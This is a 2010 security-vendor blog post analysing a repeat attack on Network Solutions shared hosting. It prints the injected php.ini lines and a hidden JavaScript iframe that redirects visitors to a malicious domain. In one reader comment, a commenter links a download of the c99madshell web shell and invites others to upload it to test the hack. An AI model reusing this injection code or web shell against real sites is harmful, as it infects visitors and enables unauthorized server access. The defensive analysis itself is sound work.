• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Continuing attacks at Network Solutions?

May 7, 2010David Dede

FacebookTwitterSubscribe

Last week we reported about an attack against Network Solutions that modified the “php.ini” file on hundreds of sites to append a malicious payload to all of their pages.

You can read more about it here:
https://blog.sucuri.net/2010/05/new-infections-today-at-network.html

The problem was caused by an internal bug on Network Solutions that was supposedly fix already.

Yet, this morning we started to receive reports of a very similar kind of attack against sites on their shared servers. According to the time stamp of files, they were added between 1 and 2am today (May 7th).

First, the cgi-bin/php.ini had this extra lines:

include_path=”.”;
;;;;;;;;;;;;;;;;;;;
display_errors= off;
;;;;;;;;;;;;;;;;;;;
error_reporting=0;
;;;;;;;;;;;;;;;;;;;
auto_append_file = .nts;
;;;;;;;;;;;;;;;;;;;

See the “auto_append_file”? It means that for every page the .nts script will be called and appended to the site.

We were able to download the .nts file and it is very similar to this one: http://sucuri.net/malware/entry/MW:GREPADD:2. Except that now it sends the victims to the domain http://virtual-ad.org by using this iframe:

document.write(‘< iframe frameborder=”0″>
onload=’ if (!this.src){
this.src=”http://virtual-ad.org/in.cgi?2″;
this.height=0; this.width=0;} ‘>< /iframe>’);

One thing interesting is that this new domain is also hosted at 188.124.16.133 and registered by:

Registrant Name:Neverglovskiy Vadim
Registrant Organization:Neverglovskiy Vadim
Registrant Email:alex1978a@bigmir.net

If you are at Network Solutions check your site now to make sure it is clean. If you have more information, share with us.

*Also, note that your site will not get blacklisted because of this malware. It avoids the Google crawler, but will still infect your users.

**Video removed. We don’t want to be giving views/attention to criminals/script kiddies that just want to show off.

As always, if you need help to recover from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

FacebookTwitterSubscribe

Categories: Web Pros, Website Malware Infections, Website SecurityTags: Hacked Websites

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. Anonymous

    May 7, 2010

    We at http://www.thevirtualtouch.com are hosted by Network Solutions and did get Blacklisted at 2pm today 5/7/10 because of the Virtual-ad. org malware. We do not see the script on the infected pages and we do not know if this was a "Timed" malware or it is hidden. When we contacted Network Solutions, instead of admitting that there was the malware problem, we were told to contact Google to straighten out the problem! NetSol just lost my business!

  2. Anonymous

    May 7, 2010

    After seeing that youtube video you posted I'm tempted to contact some of the customers via their still functional website because if they haven't tried to access their FTP or file manager they're none the wiser. Yet the video shows their files and file structures!

    Today I was using FTP getting a website ready for launch and it stopped working, mid-transfer. Too bad my client already bought their hosting package at NS. A google search reveals scary careless stuff, on NS's part. My client will definitely not be renewing!!

  3. GodRä

    May 7, 2010

    This can likely be real and probably isn't terribly hard to do. Notice the permission listed on the top, "drwxr-wr-x", since its world-readable, the person can browse around in the file tree. If there are some directories or files with o+w permission, the hacker can drop their own code into the file/dir.

    Many shared host are vuln to this type of attack, esp. ones that allow user to do chmod a dir since non-savvy users don't realize the implications of applying a o+w permission to a web-accessible file/dir.

    Btw, they are using a PHP shell called "c99madshell":

    http://madnet.name/files/download/9_c99madshell.php

    If someone has a NS acct (I don't) and wants to try and verify it, upload the PHP shell and see if you can do the same as the video. =P

    Just my 2 cents.

  4. Anonymous

    June 3, 2010

    Your scan of http://www.lcdtvassociation.org found MW:JS:205 on 03 Jun 10, so the problem persists.

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

The Anatomy of Website Malware Webinar

How to Add Security to Customer Websites Email Course

Referral Program Guide

Website Security for your Customers

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.